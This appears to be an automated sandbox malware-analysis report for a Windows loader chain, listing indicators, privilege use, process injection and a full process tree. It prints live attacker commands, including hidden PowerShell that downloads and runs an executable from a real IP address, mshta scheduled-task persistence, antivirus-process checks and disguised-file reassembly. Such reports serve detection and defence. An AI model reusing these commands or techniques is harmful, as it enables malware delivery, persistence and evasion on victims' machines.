Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	cbcc5b446e.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
3352	schtasks.exe
2692	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2704	a910f73ee1f155ed585016e76cf5532c.exe
2556	rapes.exe
992	cb979b8bfa.exe
992	cb979b8bfa.exe
992	cb979b8bfa.exe
992	cb979b8bfa.exe
992	cb979b8bfa.exe
1416	iqvtNlb.exe
2096	qQFhOl1.exe
788	c50a3f63fa.exe
3124	da9856c6cd.exe
3584	powershell.exe
3584	powershell.exe
3584	powershell.exe
1488	TempXKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE
1252	powershell.exe
2212	powershell.exe
1816	powershell.exe
3188	powershell.exe
3668	iqvtNlb.exe
3188	powershell.exe
3188	powershell.exe
4004	483d2fa8a0d53818306efeb32d3.exe
1760	Organizations.com
1760	Organizations.com
1760	Organizations.com
1760	Organizations.com
1760	Organizations.com
1760	Organizations.com
1760	Organizations.com
3992	iqvtNlb.exe
3992	iqvtNlb.exe
1316	qQFhOl1.exe
3992	iqvtNlb.exe
3992	iqvtNlb.exe
2988	844eeb687f.exe
2988	844eeb687f.exe
2988	844eeb687f.exe
2988	844eeb687f.exe
2988	844eeb687f.exe
3544	6c01425f69.exe
3544	6c01425f69.exe
3544	6c01425f69.exe
1700	chrome.exe
1700	chrome.exe
3544	6c01425f69.exe
3544	6c01425f69.exe
2476	3e219c5fa8.exe
2092	afb03093cf.exe
2476	3e219c5fa8.exe
2476	3e219c5fa8.exe
1740	a1648c690b.exe
1740	a1648c690b.exe
1740	a1648c690b.exe
1740	a1648c690b.exe
1740	a1648c690b.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2384	cbcc5b446e.exe
2384	cbcc5b446e.exe
884	9a7d1a3d45.exe
884	9a7d1a3d45.exe
884	9a7d1a3d45.exe
3544	6c01425f69.exe

Suspicious use of AdjustPrivilegeToken 31 IoCs

description	pid	Process
Token: SeDebugPrivilege	2096	qQFhOl1.exe
Token: SeDebugPrivilege	2096	qQFhOl1.exe
Token: SeDebugPrivilege	3584	powershell.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	2212	powershell.exe
Token: SeDebugPrivilege	1816	powershell.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	2496	tasklist.exe
Token: SeDebugPrivilege	3052	tasklist.exe
Token: SeDebugPrivilege	1316	qQFhOl1.exe
Token: SeDebugPrivilege	1316	qQFhOl1.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeDebugPrivilege	1648	taskkill.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeShutdownPrivilege	1700	chrome.exe
Token: SeDebugPrivilege	868	taskkill.exe
Token: SeDebugPrivilege	3964	taskkill.exe
Token: SeDebugPrivilege	2476	3e219c5fa8.exe
Token: SeDebugPrivilege	1508	taskkill.exe
Token: SeDebugPrivilege	3572	taskkill.exe
Token: SeDebugPrivilege	1100	firefox.exe
Token: SeDebugPrivilege	1100	firefox.exe

Suspicious use of FindShellTrayWindow 31 IoCs

pid	Process
2704	a910f73ee1f155ed585016e76cf5532c.exe
2280	c17573c992.exe
2280	c17573c992.exe
2280	c17573c992.exe
1760	Organizations.com
1760	Organizations.com
1760	Organizations.com
1700	chrome.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
1100	firefox.exe
1100	firefox.exe
1100	firefox.exe
1100	firefox.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe

Suspicious use of SendNotifyMessage 28 IoCs

pid	Process
2280	c17573c992.exe
2280	c17573c992.exe
2280	c17573c992.exe
1760	Organizations.com
1760	Organizations.com
1760	Organizations.com
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
1100	firefox.exe
1100	firefox.exe
1100	firefox.exe
2092	afb03093cf.exe
2092	afb03093cf.exe
2092	afb03093cf.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2704 wrote to memory of 2556	2704	a910f73ee1f155ed585016e76cf5532c.exe	31
PID 2704 wrote to memory of 2556	2704	a910f73ee1f155ed585016e76cf5532c.exe	31
PID 2704 wrote to memory of 2556	2704	a910f73ee1f155ed585016e76cf5532c.exe	31
PID 2704 wrote to memory of 2556	2704	a910f73ee1f155ed585016e76cf5532c.exe	31
PID 2556 wrote to memory of 992	2556	rapes.exe	33
PID 2556 wrote to memory of 992	2556	rapes.exe	33
PID 2556 wrote to memory of 992	2556	rapes.exe	33
PID 2556 wrote to memory of 992	2556	rapes.exe	33
PID 2556 wrote to memory of 1416	2556	rapes.exe	35
PID 2556 wrote to memory of 1416	2556	rapes.exe	35
PID 2556 wrote to memory of 1416	2556	rapes.exe	35
PID 2556 wrote to memory of 1416	2556	rapes.exe	35
PID 2556 wrote to memory of 1788	2556	rapes.exe	36
PID 2556 wrote to memory of 1788	2556	rapes.exe	36
PID 2556 wrote to memory of 1788	2556	rapes.exe	36
PID 2556 wrote to memory of 1788	2556	rapes.exe	36
PID 2556 wrote to memory of 1020	2556	rapes.exe	37
PID 2556 wrote to memory of 1020	2556	rapes.exe	37
PID 2556 wrote to memory of 1020	2556	rapes.exe	37
PID 2556 wrote to memory of 1020	2556	rapes.exe	37
PID 1020 wrote to memory of 2272	1020	RTH4oNP.exe	39
PID 1020 wrote to memory of 2272	1020	RTH4oNP.exe	39
PID 1020 wrote to memory of 2272	1020	RTH4oNP.exe	39
PID 2556 wrote to memory of 2096	2556	rapes.exe	40
PID 2556 wrote to memory of 2096	2556	rapes.exe	40
PID 2556 wrote to memory of 2096	2556	rapes.exe	40
PID 2556 wrote to memory of 2096	2556	rapes.exe	40
PID 2096 wrote to memory of 2820	2096	qQFhOl1.exe	41
PID 2096 wrote to memory of 2820	2096	qQFhOl1.exe	41
PID 2096 wrote to memory of 2820	2096	qQFhOl1.exe	41
PID 2096 wrote to memory of 2820	2096	qQFhOl1.exe	41
PID 2556 wrote to memory of 788	2556	rapes.exe	42
PID 2556 wrote to memory of 788	2556	rapes.exe	42
PID 2556 wrote to memory of 788	2556	rapes.exe	42
PID 2556 wrote to memory of 788	2556	rapes.exe	42
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 788 wrote to memory of 2864	788	c50a3f63fa.exe	43
PID 2556 wrote to memory of 3124	2556	rapes.exe	44
PID 2556 wrote to memory of 3124	2556	rapes.exe	44
PID 2556 wrote to memory of 3124	2556	rapes.exe	44
PID 2556 wrote to memory of 3124	2556	rapes.exe	44
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 3124 wrote to memory of 3580	3124	da9856c6cd.exe	46
PID 2556 wrote to memory of 2280	2556	rapes.exe	47
PID 2556 wrote to memory of 2280	2556	rapes.exe	47
PID 2556 wrote to memory of 2280	2556	rapes.exe	47
PID 2556 wrote to memory of 2280	2556	rapes.exe	47
PID 2280 wrote to memory of 1676	2280	c17573c992.exe	48

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:1260
- C:\Users\Admin\AppData\Local\Temp\a910f73ee1f155ed585016e76cf5532c.exe
  "C:\Users\Admin\AppData\Local\Temp\a910f73ee1f155ed585016e76cf5532c.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Identifies Wine through registry keys
  - Loads dropped DLL
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  PID:2704
- - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
    "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
    3⤵
    - Identifies VirtualBox via ACPI registry values (likely anti-VM)
    - Downloads MZ/PE file
    - Checks BIOS information in registry
    - Executes dropped EXE
    - Identifies Wine through registry keys
    - Loads dropped DLL
    - Adds Run key to start application
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:2556
  - - C:\Users\Admin\AppData\Local\Temp\10320830101\cb979b8bfa.exe
      "C:\Users\Admin\AppData\Local\Temp\10320830101\cb979b8bfa.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:992
  - - C:\Users\Admin\AppData\Local\Temp\10320920101\iqvtNlb.exe
      "C:\Users\Admin\AppData\Local\Temp\10320920101\iqvtNlb.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:1416
  - - C:\Users\Admin\AppData\Local\Temp\10324120101\01.exe
      "C:\Users\Admin\AppData\Local\Temp\10324120101\01.exe"
      4⤵
      Executes dropped EXE
      PID:1788
  - - C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe
      "C:\Users\Admin\AppData\Local\Temp\10325120101\RTH4oNP.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:1020
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1020 -s 36
        5⤵
        Loads dropped DLL
        
        PID:2272
  - - C:\Users\Admin\AppData\Local\Temp\10325760101\qQFhOl1.exe
      "C:\Users\Admin\AppData\Local\Temp\10325760101\qQFhOl1.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2096
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2096 -s 684
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:2820
  - - C:\Users\Admin\AppData\Local\Temp\10328870101\c50a3f63fa.exe
      "C:\Users\Admin\AppData\Local\Temp\10328870101\c50a3f63fa.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:788
    - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10328870101\c50a3f63fa.exe"
        5⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2864
  - - C:\Users\Admin\AppData\Local\Temp\10328880101\da9856c6cd.exe
      "C:\Users\Admin\AppData\Local\Temp\10328880101\da9856c6cd.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Loads dropped DLL
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of WriteProcessMemory
      PID:3124
    - - C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10328880101\da9856c6cd.exe"
        5⤵
        Downloads MZ/PE file
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3580
  - - C:\Users\Admin\AppData\Local\Temp\10328890101\c17573c992.exe
      "C:\Users\Admin\AppData\Local\Temp\10328890101\c17573c992.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:2280
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn CXsUFmal3fu /tr "mshta C:\Users\Admin\AppData\Local\Temp\xVl40m91G.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1676
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn CXsUFmal3fu /tr "mshta C:\Users\Admin\AppData\Local\Temp\xVl40m91G.hta" /sc minute /mo 25 /ru "Admin" /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3352
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\xVl40m91G.hta
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:2232
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'XKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3584
        
        C:\Users\Admin\AppData\Local\TempXKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE
        
        "C:\Users\Admin\AppData\Local\TempXKLGUPFOTEFVJXBAC604U6FUC1FAKX6O.EXE"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:1488
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c ""C:\Users\Admin\AppData\Local\Temp\10328900121\am_no.cmd" "
      4⤵
      System Location Discovery: System Language Discovery
      PID:3540
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        5⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3896
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2492
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1252
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2872
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2212
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2272
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        6⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1816
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "MO7Suma34K2" /tr "mshta \"C:\Temp\yOMYfPCmu.hta\"" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2692
    - - C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\yOMYfPCmu.hta"
        5⤵
        System Location Discovery: System Language Discovery
        Modifies Internet Explorer settings
        
        PID:1716
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        6⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3188
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        
        PID:4004
  - - C:\Users\Admin\AppData\Local\Temp\10328910101\iqvtNlb.exe
      "C:\Users\Admin\AppData\Local\Temp\10328910101\iqvtNlb.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      PID:3668
  - - C:\Users\Admin\AppData\Local\Temp\10328920101\tK0oYx3.exe
      "C:\Users\Admin\AppData\Local\Temp\10328920101\tK0oYx3.exe"
      4⤵
      Executes dropped EXE
      PID:2340
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2340 -s 36
        5⤵
        Loads dropped DLL
        
        PID:3020
  - - C:\Users\Admin\AppData\Local\Temp\10328930101\xu5e1_003.exe
      "C:\Users\Admin\AppData\Local\Temp\10328930101\xu5e1_003.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1888
  - - C:\Users\Admin\AppData\Local\Temp\10328940101\RTH4oNP.exe
      "C:\Users\Admin\AppData\Local\Temp\10328940101\RTH4oNP.exe"
      4⤵
      Executes dropped EXE
      PID:1516
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 1516 -s 36
        5⤵
        Loads dropped DLL
        
        PID:2976
  - - C:\Users\Admin\AppData\Local\Temp\10328950101\zx4PJh6.exe
      "C:\Users\Admin\AppData\Local\Temp\10328950101\zx4PJh6.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      PID:444
    - - C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Spare.wmv Spare.wmv.bat & Spare.wmv.bat
        5⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:956
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2496
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2992
      - C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        6⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:3052
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1744
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 440824
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3020
      - C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Architecture.wmv
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1752
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "Offensive" Inter
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2624
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 440824\Organizations.com + Flexible + Damn + Hard + College + Corp + Cj + Boulevard + Drainage + Truth 440824\Organizations.com
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2748
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Dancing.wmv + ..\Ka.wmv + ..\Bali.wmv + ..\Liability.wmv + ..\Lamps.wmv + ..\Electro.wmv + ..\Shakespeare.wmv + ..\Make.wmv + ..\Physiology.wmv + ..\Witness.wmv + ..\Submitting.wmv + ..\Bd.wmv h
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:1884
      - C:\Users\Admin\AppData\Local\Temp\440824\Organizations.com
        
        Organizations.com h
        6⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1760
      - C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3696
  - - C:\Users\Admin\AppData\Local\Temp\10328960101\01.exe
      "C:\Users\Admin\AppData\Local\Temp\10328960101\01.exe"
      4⤵
      Executes dropped EXE
      PID:3276
  - - C:\Users\Admin\AppData\Local\Temp\10328970101\OkH8IPF.exe
      "C:\Users\Admin\AppData\Local\Temp\10328970101\OkH8IPF.exe"
      4⤵
      Executes dropped EXE
      PID:3320
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3320 -s 36
        5⤵
        Loads dropped DLL
        
        PID:3824
  - - C:\Users\Admin\AppData\Local\Temp\10328980101\qQFhOl1.exe
      "C:\Users\Admin\AppData\Local\Temp\10328980101\qQFhOl1.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1316
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1316 -s 700
        5⤵
        Loads dropped DLL
        Program crash
        
        PID:3888
  - - C:\Users\Admin\AppData\Local\Temp\10328990101\7ab6b77b2b.exe
      "C:\Users\Admin\AppData\Local\Temp\10328990101\7ab6b77b2b.exe"
      4⤵
      Executes dropped EXE
      PID:3804
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3804 -s 36
        5⤵
        
        PID:1628
  - - C:\Users\Admin\AppData\Local\Temp\10329000101\844eeb687f.exe
      "C:\Users\Admin\AppData\Local\Temp\10329000101\844eeb687f.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:2988
  - - C:\Users\Admin\AppData\Local\Temp\10329010101\6c01425f69.exe
      "C:\Users\Admin\AppData\Local\Temp\10329010101\6c01425f69.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Downloads MZ/PE file
      Checks BIOS information in registry
      Executes dropped EXE
      Identifies Wine through registry keys
      Suspicious use of NtSetInformationThreadHideFromDebugger
      System Location Discovery: System Language Discovery
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:3544
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
        5⤵
        Uses browser remote debugging
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
